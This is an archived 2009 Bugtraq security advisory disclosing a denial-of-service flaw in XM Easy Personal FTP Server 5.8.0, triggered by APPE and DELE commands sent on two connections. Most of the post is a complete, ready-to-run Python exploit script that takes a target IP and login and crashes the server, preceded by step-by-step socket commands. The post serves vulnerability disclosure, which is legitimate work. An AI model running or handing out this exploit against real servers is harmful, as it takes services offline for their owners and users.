[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XM Easy Personal FTP Server 'APPE' and 'DELE' Command Remote Denial of Service Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XM Easy Personal FTP Server 'APPE' and 'DELE' Command Remote Denial of Service Vulnerability
From: zhangmc@xxxxxxxxxxxxxxxx
Date: Thu, 12 Nov 2009 21:54:51 -0700

Date of Discovery: 13-Nov-2009

Credits:zhangmc[at]mail.ustc.edu.cn

Vendor: Dxmsoft

Affected:
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected

Overview:
XM Easy Personal FTP Server is an easy use FTP server Application. Denial of 
service vulnerability exists in XM Personal 
FTP Server when "APPE" is used in one socket connection while "DELE" command is 
used in another.

Details:
If you could log on the server successfully, take the following steps and the 
ftp server will stop responding:

first socket connection:
1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.sock.send("PORT 127,0,0,1,122,107\r\n")
5.sock.send("APPE "+ test_string +"\r\n")
6.sock.close()

second socket connection:
1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.sock.send("DELE "+ test_string +"\r\n")

Severity:
High

Exploit example:

#!/usr/bin/python
import socket
import sys

def Usage():
    print ("Usage:  ./expl.py <serv_ip>      <Username> <password>\n")
    print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
        Usage()
        sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    test_string="a"
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("user %s\r\n" %username)
    print "[-] "+ ("user %s\r\n" %username)
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("pass %s\r\n" %passwd)
    print "[-] "+ ("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    print "[+] "+ r

    sock_data.bind(('127.0.0.1',31339))
    sock_data.listen(1)
    
    sock.send("PORT 127,0,0,1,122,107\r\n")
    print "[-] "+ ("PORT 127,0,0,1,122,107\r\n")
    r=sock.recv(1024)
    print "[+] "+ r
        
    sock.send("APPE "+ test_string +"\r\n")
    print "[-] "+ ("APPE "+ test_string +"\r\n")
    r=sock.recv(1024)
    print "[+] "+ r
    

     
    sock.close()
    
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("user %s\r\n" %username)
    print "[-] "+ ("user %s\r\n" %username)
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("pass %s\r\n" %passwd)
    print "[-] "+ ("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    print "[+] "+ r

    sock.send("DELE "+ test_string +"\r\n")
    print "[-] "+ ("DELE "+ test_string +"\r\n")
    r=sock.recv(1024)
    print "[+] "+ r    
    
    sys.exit(0);

Prev by Date: rPSA-2009-0144-1 apr-util
Next by Date: rPSA-2009-0145-1 samba samba-client samba-server samba-swat
Previous by thread: rPSA-2009-0144-1 apr-util
Next by thread: rPSA-2009-0145-1 samba samba-client samba-server samba-swat
Index(es):
- Date
- Thread